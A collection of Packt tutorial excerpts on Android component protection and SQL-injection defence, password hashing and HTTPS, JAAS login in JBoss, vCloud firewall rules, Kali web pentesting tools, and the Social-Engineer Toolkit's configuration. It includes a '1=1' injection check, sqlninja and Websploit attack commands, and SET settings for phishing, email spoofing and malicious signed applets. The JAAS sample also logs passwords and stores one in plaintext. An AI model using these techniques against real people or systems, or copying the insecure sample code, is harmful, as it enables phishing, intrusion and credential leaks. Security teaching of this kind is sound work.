recipe, I have detailed some of the measures that you can take to protect generic components, whether they are activities, broadcast receivers, content providers, or services. How to do it... To start off, we need to review your Android application AndroidManifest.xml file. The android:exported attribute defines whether a component can be invoked by other applications. If any of your application components do not need to be invoked by other applications or need to be explicitly shielded from interaction with the components on the rest of the Android system—other than components internal to your application—you should add the following attribute to the application component's XML element: <[component name] android_exported="false"> </[component name]> Here the [component name] would either be an activity, provider, service, or receiver. How it works… Enforcing permissions via the AndroidManifest.xml file means different things to each of the application component types. This is because of the various inter-process communications ( IPC ) mechanisms that can be used to interact with them. 
For every application component, the android:permission attribute does the following:

- Activity: Limits the external application components that can successfully call startActivity or startActivityForResult to those holding the required permission
- Service: Limits the external application components that can bind to (by calling bindService()) or start (by calling startService()) the service to those holding the specified permission
- Receiver: Limits the external application components that can send broadcast intents to the receiver to those holding the specified permission
- Provider: Limits access to data that is made accessible via the content provider

The android:permission attribute of each component's XML element overrides the <application> element's android:permission attribute. This means that if you haven't specified any required permissions for your components but have specified one in the <application> element, it will apply to all of the components contained in it. Specifying permissions via the <application> element is not something developers do too often, because of how it affects the friendliness of the components toward the Android system itself: for example, if you override an activity's required permissions using the <application> element, the home launcher will not be able to start your activity. That being said, if you are paranoid enough and don't want any unauthorized interaction to happen with your application or its components, you should make use of the android:permission attribute of the <application> tag.

When you define an <intent-filter> element on a component, it will automatically be exported unless you explicitly set exported="false". However, this seemed to be a lesser-known fact, as many developers were inadvertently opening their content providers to other applications. So, Google responded by changing the default behavior for <provider> in Android 4.2: if you set either android:minSdkVersion or android:targetSdkVersion to 17, the exported attribute on <provider> will default to false.

Defending against the SQL-injection attack

The previous chapter covered some of the common attacks against content providers, one of them being the infamous SQL-injection attack. This attack leverages the fact that adversaries can supply SQL statements or SQL-related syntax as part of their selection arguments, projections, or any component of a valid SQL statement, allowing them to extract more information from a content provider than they are authorized to access. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery(), opting instead for a parameterized statement. Using a compiled statement, such as SQLiteStatement, offers both binding and escaping of arguments to defend against SQL-injection attacks. There is also a performance benefit, because the database does not need to parse the statement for each execution. An alternative to SQLiteStatement is to use the query, insert, update, and delete methods on SQLiteDatabase, as they offer parameterized statements via their use of string arrays. When we describe a parameterized statement, we are describing a SQL statement with question-mark placeholders where values will be inserted or bound. Here's an example of a parameterized SQL insert statement:

INSERT INTO [table name] VALUES (?,?,?,?,...)

Here, [table name] would be the name of the relevant table into which values have to be inserted.
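Once you have applied these defenses (restricting exported components, requiring permissions, and moving to parameterized statements, as the recipe that follows shows), it is worth rerunning the same drozer check used earlier against your provider. The command below simply repeats the earlier query as a sketch, using the hypothetical URI from that example; a hardened provider should no longer return every row for an injected tautology:

dz> run app.provider.query content://com.example.vulnerabledatabase.contentprovider/statements --selection "1=1"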
How to do it... For this example, we are using a simple Data Access Object ( DAO ) pattern, where all of the database operations for RSS items are contained within the RssItemDAO class: When we instantiate RssItemDAO, we compile the insertStatement object with a parameterized SQL insert statement string. This needs to be done only once and can be re-used for multiple inserts: public class RssItemDAO { private SQLiteDatabase db; private SQLiteStatement insertStatement; private static String COL_TITLE = "title"; private static String TABLE_NAME = "RSS_ITEMS"; private static String INSERT_SQL = "insert into " + TABLE_NAME + " (content, link, title) values (?,?,?)"; public RssItemDAO(SQLiteDatabase db) { this.db = db; insertStatement = db.compileStatement(INSERT_SQL); } The order of the columns noted in the INSERT_SQL variable is important, as it directly maps to the index when binding values. In the preceding example, content maps to index 0, link maps to index 1, and title to index 2. Now, when we come to insert a new RssItem object to the database, we bind each of the properties in the order they appear in the statement: public long save(RssItem item) { insertStatement.bindString(1, item.getContent()); insertStatement.bindString(2, item.getLink()); insertStatement.bindString(3, item.getTitle()); return insertStatement.executeInsert(); } Notice that we call executeInsert, a helper method that returns the ID of the newly created row. It's as simple as that to use a SQLiteStatement statement. This shows how to use SQLiteDatabase.query to fetch RssItems that match a given search term: public List<RssItem> fetchRssItemsByTitle(String searchTerm) { Cursor cursor = db.query(TABLE_NAME, null, COL_TITLE + "LIKE ?", new String[] { "%" + searchTerm + "%" }, null, null, null); // process cursor into list List<RssItem> rssItems = new ArrayList<RssItemDAO.RssItem>(); cursor.moveToFirst(); while (!cursor.isAfterLast()) { // maps cursor columns of RssItem properties RssItem item = cursorToRssItem(cursor); rssItems.add(item); cursor.moveToNext(); } return rssItems; } We use LIKE and the SQL wildcard syntax to match any part of the text with a title column. Summary There were a lot of technical details in this article. Firstly, we learned about the components that are vulnerable to SQL-injection attacks. We then figured out how to secure our Android applications from the exploitation attacks. Finally, we learned how to defend our applications from the SQL-injection attacks. Resources for Article: Further resources on this subject: Android Native Application API [Article] So, what is Spring for Android? [Article] Creating Dynamic UI with Android Fragments [Article]


Rounding up...

Packt
25 Nov 2013
3 min read
We have now successfully learned how to secure our users' passwords using hashes; however, we should also take a look at the big picture, just in case. The following figure shows what a very basic web application looks like. Note the HTTPS transmission tag: HTTPS is a secure transfer protocol that allows us to transport information securely. When we transport sensitive data such as passwords in a web application without it, anyone who intercepts the connection can easily get the password in plain text, and our users' data would be compromised. In order to avoid this, we should always use HTTPS when sensitive data is involved. HTTPS is fairly easy to set up: you just need to buy an SSL certificate and configure it with your hosting provider. Configuration varies depending on the provider, but usually they provide an easy way to do it. It is strongly suggested to use HTTPS for authentication, sign-up, sign-in, and other processes involving sensitive data. As a general rule, most (if not all) of the data exchange that requires the user to be logged in should be protected. Keep in mind that HTTPS comes at a cost, so try to avoid using it on static pages that contain only public information. Always remember that to protect the password, we need to ensure both secure transport (with HTTPS) and secure storage (with strong hashes); both are critical phases and we need to be very careful with them.

Now that our passwords and other sensitive data are being transferred in a secure way, we can get into the application workflow. Consider the following steps for an authentication process:

1. The application receives an authentication request.
2. The Web Layer takes care of it: it gets the parameters (username and password) and passes them to the Authentication Service.
3. The Authentication Service calls the Database Access Layer to retrieve the user from the database.
4. The Database Access Layer queries the database, gets the user, and returns it to the Authentication Service.
5. The Authentication Service gets the stored hash from the user data retrieved from the database, extracts the salt and the number of iterations, and calls the Hashing Utility, passing it the password from the authentication request, the salt, and the iterations.
6. The Hashing Utility generates the hash and returns it to the Authentication Service.
7. The Authentication Service performs a constant-time comparison between the stored hash and the generated hash, and informs the Web Layer whether the user is authenticated or not.
8. The Web Layer returns the corresponding view to the user, depending on whether they are authenticated or not.

The following figure can help us understand how this works; please note that flows 1, 2, 3, and 4 are bidirectional. The Authentication Service and the Hashing Utility components are the ones we have been working with so far. We already know how to create hashes; this workflow is an example to help us understand when we should use them.

Summary

In this article we learned how to create hashes and have now successfully learned how to secure our users' passwords using them. We have also learned that we need to ensure secure transport (with HTTPS) as well as secure storage (with strong hashes).

Resources for Article:

Further resources on this subject:
- FreeRADIUS Authentication: Storing Passwords [Article]
- EJB 3.1: Controlling Security Programmatically Using JAAS [Article]
- So, what is Spring for Android? [Article]

JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.)

The deployment descriptor is the main configuration file of all the web applications. The container first looks for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd.

The following are the schema elements available in the XSD:

    <xsd:element name="security-constraint" type="j2ee:security-constraintType"/>
    <xsd:element name="login-config" type="j2ee:login-configType"/>
    <xsd:element name="security-role" type="j2ee:security-roleType"/>

Getting ready

You will need the following to demonstrate authentication and authorization:

- JBoss 7
- Eclipse Indigo 3.7
- Create a dynamic web project and name it Security Demo
- Create a package, com.servlets
- Create an XML file in the WebContent folder, jboss-web.xml
- Create two JSP pages, login.jsp and logoff.jsp

How to do it...

Perform the following steps to achieve JAAS-based security for JSPs:

1. Edit the login.jsp file with the input fields j_username and j_password, and submit it to SecurityCheckerServlet:

    <%@ page contentType="text/html; charset=UTF-8" %>
    <%@ page language="java" %>
    <html>
    <HEAD>
    <TITLE>PACKT Login Form</TITLE>
    <SCRIPT>
    function submitForm() {
        var frm = document.myform;
        if (frm.j_username.value == "") {
            alert("please enter your username, its empty");
            frm.j_username.focus();
            return;
        }
        if (frm.j_password.value == "") {
            alert("please enter the password, its empty");
            frm.j_password.focus();
            return;
        }
        frm.submit();
    }
    </SCRIPT>
    </HEAD>
    <BODY>
    <FORM name="myform" action="SecurityCheckerServlet" METHOD=get>
    <TABLE width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="white">
    <TABLE width="100%" border="0" cellspacing="0" cellpadding="5">
    <TR align="center">
        <TD align="right" class="Prompt"></TD>
        <TD align="left">
            <INPUT type="text" name="j_username" maxlength=20>
        </TD>
    </TR>
    <TR align="center">
        <TD align="right" class="Prompt"> </TD>
        <TD align="left">
            <INPUT type="password" name="j_password" maxlength=20>
            <BR>
    <TR align="center">
        <TD align="right" class="Prompt"> </TD>
        <TD align="left">
            <input type="submit" onclick="javascript:submitForm();" value="Login">
        </TD>
    </TR>
    </TABLE>
    </FORM>
    </BODY>
    </html>

   The j_username and j_password fields are the indicators of using form-based authentication.

2. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see that role information is displayed. Update the web.xml file as shown in the following code snippet. We have used the 2.5 XSD.
   The following code needs to be placed between the web-app tags in the web.xml file:

    <display-name>jaas-jboss</display-name>
    <welcome-file-list>
        <welcome-file>index.html</welcome-file>
        <welcome-file>index.htm</welcome-file>
        <welcome-file>index.jsp</welcome-file>
        <welcome-file>default.html</welcome-file>
        <welcome-file>default.htm</welcome-file>
        <welcome-file>default.jsp</welcome-file>
    </welcome-file-list>
    <security-constraint>
        <web-resource-collection>
            <web-resource-name>something</web-resource-name>
            <description>Declarative security tests</description>
            <url-pattern>*.jsp</url-pattern>
            <http-method>HEAD</http-method>
            <http-method>GET</http-method>
            <http-method>POST</http-method>
            <http-method>PUT</http-method>
            <http-method>DELETE</http-method>
        </web-resource-collection>
        <auth-constraint>
            <role-name>role1</role-name>
        </auth-constraint>
        <user-data-constraint>
            <description>no description</description>
            <transport-guarantee>NONE</transport-guarantee>
        </user-data-constraint>
    </security-constraint>
    <login-config>
        <auth-method>FORM</auth-method>
        <form-login-config>
            <form-login-page>/login.jsp</form-login-page>
            <form-error-page>/logoff.jsp</form-error-page>
        </form-login-config>
    </login-config>
    <security-role>
        <description>some role</description>
        <role-name>role1</role-name>
    </security-role>
    <security-role>
        <description>packt managers</description>
        <role-name>manager</role-name>
    </security-role>
    <servlet>
        <description></description>
        <display-name>SecurityCheckerServlet</display-name>
        <servlet-name>SecurityCheckerServlet</servlet-name>
        <servlet-class>com.servlets.SecurityCheckerServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>SecurityCheckerServlet</servlet-name>
        <url-pattern>/SecurityCheckerServlet</url-pattern>
    </servlet-mapping>

3. JAAS security checker and credential handler: the servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandler, and add all the other necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the handler object to the LoginContext class, which has the login() method to do the authentication. On successful authentication, it will create a Subject and Principal for the user, with user details. We use the Iterator interface to iterate over the LoginContext object to get the user details retrieved for authentication.

   In the SecurityCheckerServlet class:

    package com.servlets;

    public class SecurityCheckerServlet extends HttpServlet {
        private static final long serialVersionUID = 1L;

        public SecurityCheckerServlet() {
            super();
        }

        protected void doGet(HttpServletRequest request, HttpServletResponse response)
                throws ServletException, IOException {
            char[] password = null;
            PrintWriter out = response.getWriter();
            try {
                SecurityAssociationHandler handler = new SecurityAssociationHandler();
                SimplePrincipal user = new SimplePrincipal(request.getParameter("j_username"));
                password = request.getParameter("j_password").toCharArray();
                handler.setSecurityInfo(user, password);
                System.out.println("password" + password);

                CallbackHandler myHandler = new UserCredentialHandler(
                        request.getParameter("j_username"), request.getParameter("j_password"));
                LoginContext lc = new LoginContext("other", handler);
                lc.login();

                Subject subject = lc.getSubject();
                Set principals = subject.getPrincipals();
                List l = new ArrayList();
                Iterator it = lc.getSubject().getPrincipals().iterator();
                while (it.hasNext()) {
                    System.out.println("Authenticated: " + it.next().toString() + "<br>");
                    out.println("<b><html><body><font color='green'>Authenticated: "
                            + request.getParameter("j_username") + " <br/>"
                            + it.next().toString() + "<br/></font></b></body></html>");
                }
                it = lc.getSubject().getPublicCredentials(Properties.class).iterator();
                while (it.hasNext())
                    System.out.println(it.next().toString());
                lc.logout();
            } catch (Exception e) {
                out.println("<b><font color='red'>failed authentication.</font>-</b>" + e);
            }
        }

        protected void doPost(HttpServletRequest request, HttpServletResponse response)
                throws ServletException, IOException {
        }
    }

4. Create the UserCredentialHandler file:

    package com.servlets;

    class UserCredentialHandler implements CallbackHandler {
        private String user, pass;

        UserCredentialHandler(String user, String pass) {
            super();
            this.user = user;
            this.pass = pass;
        }

        @Override
        public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException {
            for (int i = 0; i < callbacks.length; i++) {
                if (callbacks[i] instanceof NameCallback) {
                    NameCallback nc = (NameCallback) callbacks[i];
                    nc.setName(user);
                } else if (callbacks[i] instanceof PasswordCallback) {
                    PasswordCallback pc = (PasswordCallback) callbacks[i];
                    pc.setPassword(pass.toCharArray());
                } else {
                    throw new UnsupportedCallbackException(callbacks[i], "Unrecognized Callback");
                }
            }
        }
    }

5. In the jboss-web.xml file:

    <?xml version="1.0" encoding="UTF-8"?>
    <jboss-web>
        <security-domain>java:/jaas/other</security-domain>
    </jboss-web>

   Here, other is the name of the application policy defined in the login-config.xml file. All of this will be packed as a .war file.

6. Configure the JBoss Application Server. Go to jboss-5.1.0.GA/server/default/conf/login-config.xml in JBoss. If you look at the file, you can see various configurations for databases and LDAP, and a simple one using properties files, which I have used in the following code snippet:

    <application-policy name="other">
        <!-- A simple server login module, which can be used when the number of users
             is relatively small. It uses two properties files:
             users.properties, which holds users (key) and their password (value).
             roles.properties, which holds users (key) and a comma-separated list of
             their roles (value).
             The unauthenticatedIdentity property defines the name of the principal that
             will be used when a null username and password are presented as is the case
             for an unauthenticated web client or MDB. If you want to allow such users to
             be authenticated add the property, e.g., unauthenticatedIdentity="nobody" -->
        <authentication>
            <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag="required">
                <module-option name="usersProperties">users.properties</module-option>
                <module-option name="rolesProperties">roles.properties</module-option>
                <module-option name="unauthenticatedIdentity">nobody</module-option>
            </login-module>
        </authentication>
    </application-policy>

7. Create the users.properties file in the same folder. The following are the users.properties and roles.properties files, with the username mapped to its password and role, respectively:

    users.properties
    anjana=anjana123

    roles.properties
    anjana=role1

8. Restart the server.

How it works...

JAAS consists of a set of interfaces to handle the authentication process. They are:

- The CallbackHandler and Callback interfaces
- The LoginModule interface
- LoginContext

The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific; each container will have its own implementation. Here we are using the JBoss application server to demonstrate JAAS.

In my previous example, I explicitly called the JAAS interfaces. UserCredentialHandler implements the CallbackHandler interface. So, CallbackHandlers are storage spaces for the user credentials, and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to the LoginModule interfaces for authentication:

    CallbackHandler myHandler = new UserCredentialHandler(
            request.getParameter("j_username"), request.getParameter("j_password"));
    LoginContext lc = new LoginContext("other", handler);
    lc.login();

The web.xml file defines the security mechanisms and also points us to the protected resources in our application.

The following screenshot shows a failed authentication window:

The following screenshot shows a successful authentication window:

Summary

We introduced the JAAS-based mechanism of applying security to authenticate and authorize the users of the application.

Resources for Article:

Further resources on this subject:
Spring Security 3: Tips and Tricks [Article]
Spring Security: Configuring Secure Passwords [Article]
Migration to Spring Security 3 [Article]

Securing vCloud Using the vCloud Networking and Security App Firewall

Packt
12 Nov 2013
6 min read
(For more resources related to this topic, see here.)

Creating a vCloud Networking and Security App firewall rule

In this article, we will create a VMware vCloud Networking and Security App firewall rule that restricts inbound HTTP traffic destined for a web server:

1. Open the vCloud Networking and Security Manager URL in a supported browser; it can also be accessed from the vCenter client.
2. Log in to vCloud Networking and Security as admin.
3. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter.
4. In the right-hand pane, click on the App Firewall tab.
5. Click on the Networks link.
6. On the General tab, click on the + link.
7. Point to the new rule Name cell and click on the + icon. In the rule Name panel, type Deny HTTP in the textbox and click on OK.
8. Point to the Destination cell and click on the + icon. In the input panel, perform the following actions:
   - Go to IP Addresses from the drop-down menu.
   - At the bottom of the panel, click on the New IP Addresses link.
   - In the Add IP Addresses panel, configure an address set that includes the web server.
   - Click on OK.
9. Point to the Service cell and click on the + icon. In the input panel, perform the following actions:
   - Sort the Available list by name.
   - Scroll down and go to the HTTP service checkbox.
   - Click on the blue right-arrow to move the HTTP service from the Available list to the Selected list.
   - Click on OK.
10. Go to the Action cell and click on the + icon. In the input panel, click on Block and Log. Click on OK.
11. Click on the Publish Changes button, located above the rules list, on the green bar.

In general, create firewall rules that meet your business needs. In addition, you might consider the following guidelines:

- Where possible, when identifying the source and destination, take advantage of vSphere groupings in your vCenter Server inventory, such as the datacenter, cluster, and vApp. By writing rules in terms of these groupings, the number of firewall rules is reduced, which makes the rules easier to track and less prone to configuration errors.
- If a vSphere grouping does not suit your needs because you need to create a more specialized group, take advantage of security groups. Like vSphere groupings, security groups reduce the number of rules that you need to create, making the rules easier to track and maintain.
- Finally, set the action on the default firewall rules based on your business policy. For example, as a security best practice, you might deny all traffic by default. If all traffic is denied, vCloud Networking and Security App drops all incoming and outgoing traffic. Allowing all traffic by default makes your datacenter very accessible, but also insecure.

vCloud Networking and Security App – flow monitoring

Flow monitoring is a traffic analysis tool that provides a detailed view of the traffic on your virtual network that passes through a vCloud Networking and Security App. The flow monitoring output defines which machines are exchanging data and over which application. This data includes the number of sessions, packets, and bytes transmitted per session. Session details include sources, destinations, direction of sessions, applications, and ports used. Session details can be used to create firewall rules to allow or block traffic. You can use flow monitoring as a forensic tool to detect rogue services and examine outbound sessions (a small offline aggregation example of the same idea appears at the end of this article).

The main advantages of flow monitoring are:

- You can easily analyze inter-VM traffic.
- Dynamic rules can be created right from the flow monitoring console.
- You can use it for debugging network-related problems, as you can enable logging for every individual virtual machine on an as-needed basis.

You can view traffic sessions inspected by a vCloud Networking and Security App within the specified time span. The last 24 hours of data are displayed by default; the minimum time span is 1 hour, and the maximum is 2 weeks. The bar at the top of the page shows the percentage of allowed traffic in green and blocked traffic in red.

Examining flow monitoring statistics

Let us examine the statistics for the Top Flows, Top Destinations, and Top Sources categories:

1. Open the vCloud Networking and Security Manager URL in a supported browser.
2. Log in to vCloud Networking and Security as admin.
3. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter.
4. In the right-hand pane, click on the Network Virtualization link.
5. Click on the Networks link.
6. In the networks list, click on the network where you want to monitor the flow.
7. Click on the Flow Monitoring button.
8. Verify that Flow Monitoring | Summary is selected.
9. On the far right side of the page, across from the Summary and Details links, click on the Time Interval Change link.
10. On the Time Interval panel, select the Last 1 week radio button and click on Update.
11. Verify that the Top Flows button is selected. Use the Top Flows table to determine which flow has the highest volume of bytes and which flow has the highest volume of packets.
12. Use the mouse wheel or the vertical scroll bar to view the graph. Point to the apex of three different colored lines and determine which network protocol is reported.
13. Scroll to the top of the form and click on the Top Destinations button. Use the Top Destinations table to determine which destination has the highest volume of incoming bytes and which destination has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph.
14. Scroll to the top of the form and click on the Top Sources button. Use the Top Sources table to determine which source has the highest volume of bytes and which source has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph.

Summary

In this article we learned how to create access control policies based on logical constructs such as VMware vCenter Server containers and VMware vCloud Networking and Security Security Groups, and not just physical constructs such as IP addresses.

Resources for Article:

Further resources on this subject:
Windows 8 with VMware View [Article]
VMware View 5 Desktop Virtualization [Article]
Cloning and Snapshots in VMware Workstation [Article]
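As a purely illustrative aside (not a vCloud Networking and Security feature or API), the Top Sources and Top Destinations views described above boil down to summing bytes per endpoint. The short Python sketch below performs the same aggregation offline, assuming flow records have been exported to a hypothetical CSV file named flows.csv with source, destination, and bytes columns:

    # Offline illustration of a "top talkers" aggregation over exported flow records.
    # The file name and column names are assumptions, not part of the product.
    import csv
    from collections import Counter

    bytes_per_source = Counter()
    bytes_per_destination = Counter()

    with open("flows.csv", newline="") as f:
        for row in csv.DictReader(f):
            bytes_per_source[row["source"]] += int(row["bytes"])
            bytes_per_destination[row["destination"]] += int(row["bytes"])

    print("Top sources by bytes:", bytes_per_source.most_common(3))
    print("Top destinations by bytes:", bytes_per_destination.most_common(3))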

Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.)

Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that can lead to a security breach. This is where web app penetration testing jumps in and helps you secure your application. Web app penetration testing can be implemented on various fronts such as the frontend interface, the database, and the web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing.

WebScarab proxy

WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features such as XSS/CSRF detection, session ID analysis, and fuzzing. Follow these three steps to get started with WebScarab:

1. To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab.
2. Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008. Save the settings and go back to the WebScarab GUI (a small scripted example of sending traffic through this proxy appears at the end of this article).
3. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server.

Attacking the database using sqlninja

sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps; hence, even a single flaw in them can lead to mass compromise of information. Let us see how sqlninja can be used for database penetration testing.

To launch sqlninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with the sqlninja parameters. The important parameter to look for is either the mode parameter or the -m parameter. The -m parameter specifies the type of operation we want to perform over the target database. Let us pass a basic command and analyze the output:

    root@kali:~# sqlninja -m test
    Sqlninja rel. 0.2.3-r1
    Copyright (C) 2006-2008 icesurfer
    [-] sqlninja.conf does not exist. You want to create it now ? [y/n]

This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing.

The Websploit framework

Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very similar to Metasploit and incorporates many of its plugins to add functionality. To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework. Passing the update command at the terminal will begin the updating process as follows:

    wsf> update
    [*] Updating Websploit framework, Please Wait...

Once the update is over, you can check out the available modules by passing the following command:

    wsf> show modules

Let us launch a simple directory scanner module against www.target.com as follows:

    wsf> use web/dir_scanner
    wsf:Dir_Scanner> show options
    wsf:Dir_Scanner> set TARGET www.target.com
    wsf:Dir_Scanner> run

Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios.

Summary

In this article, we covered the following sections:

- WebScarab proxy
- Attacking the database using sqlninja
- The Websploit framework

Resources for Article:

Further resources on this subject:
Installing VirtualBox on Linux [Article]
Linux Shell Script: Tips and Tricks [Article]
Installing Arch Linux using the official ISO [Article]
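As an aside that is not part of the original article, once WebScarab is listening on 127.0.0.1:8008 as configured earlier, scripted traffic can be routed through the same proxy so that it shows up in the Proxy tab alongside browser requests. A minimal Python sketch using the requests library follows; the target URL is hypothetical:

    # Route a scripted HTTP request through the WebScarab proxy for interception.
    import requests

    proxies = {
        "http": "http://127.0.0.1:8008",
        "https": "http://127.0.0.1:8008",
    }

    # verify=False because an intercepting proxy re-signs HTTPS traffic with its own certificate.
    response = requests.get("http://testsite.example.com/login", proxies=proxies, verify=False)
    print(response.status_code, len(response.text))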

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.)

Social engineering is an act of manipulating people to perform actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked into revealing his/her login information by sending a fake login/phishing page.

The Social-Engineer Toolkit is designed to perform such tricking activities. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspects of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering.

Getting started with the Social-Engineer Toolkit (SET)

Let's start our introductory recipe about SET, where we will be discussing SET on different platforms.

Getting ready

SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article.

How to do it...

To launch SET on BackTrack, start the terminal window and pass the following path:

    root@bt:~# cd /pentest/exploits/set
    root@bt:/pentest/exploits/set# ./set
    Copyright 2012, The Social-Engineer Toolkit (SET)
    All rights reserved.
    Select from the menu:

If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit.

How it works...

SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET.

There's more...

Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps:

1. You should remove the old SET using the following command:

    dpkg -r set

   We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, make sure we are in the directory, and then use the rm command to remove all the files present there. Or, we can use the method shown previously.

2. Then, for reinstallation, we can download its clone using the following command:

    git clone https://github.com/trustedsec/social-engineer-toolkit /set

Working with the SET config file

In this recipe, we will take a close look at the SET config file, which contains default values for the different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file.

Getting ready

To launch the config file, move to the config folder and open the set_config file:

    root@bt:/pentest/exploits/set# nano config/set_config

The configuration file will be launched with some introductory statements, as shown in the following screenshot:

How to do it...

Let's go through it step-by-step. First, we will see what configuration settings are available for us:

    # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
    METASPLOIT_PATH=/pentest/exploits/framework3

The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework:

    # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
    # EXAMPLE: ETTERCAP_INTERFACE=wlan0
    ETTERCAP_INTERFACE=eth0
    #
    # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
    ETTERCAP_PATH=/usr/share/ettercap

Ettercap is a multipurpose sniffer for switched LANs. The Ettercap section can be used to perform LAN attacks such as DNS poisoning and spoofing. The preceding SET settings can be used to turn Ettercap ON or OFF depending on the usability.

    # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
    SENDMAIL=OFF

The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF.

The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack:

    # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
    # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
    # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
    SELF_SIGNED_APPLET=OFF

We will discuss this attack vector in detail in a later recipe, that is, the spear-phishing attack vector. This attack vector will also require the JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail:

    SELF_SIGNED_APPLET=ON

    # AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
    # SET TO AUTODETECT YOUR INTERFACE
    AUTO_DETECT=ON

The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/port forwarding, and it allows you to connect to the external Internet.

The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance:

    # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
    # THE ATTACK VECTOR
    APACHE_SERVER=OFF
    #
    # PATH TO THE APACHE WEBROOT
    APACHE_DIRECTORY=/var/www

The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF:

    # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
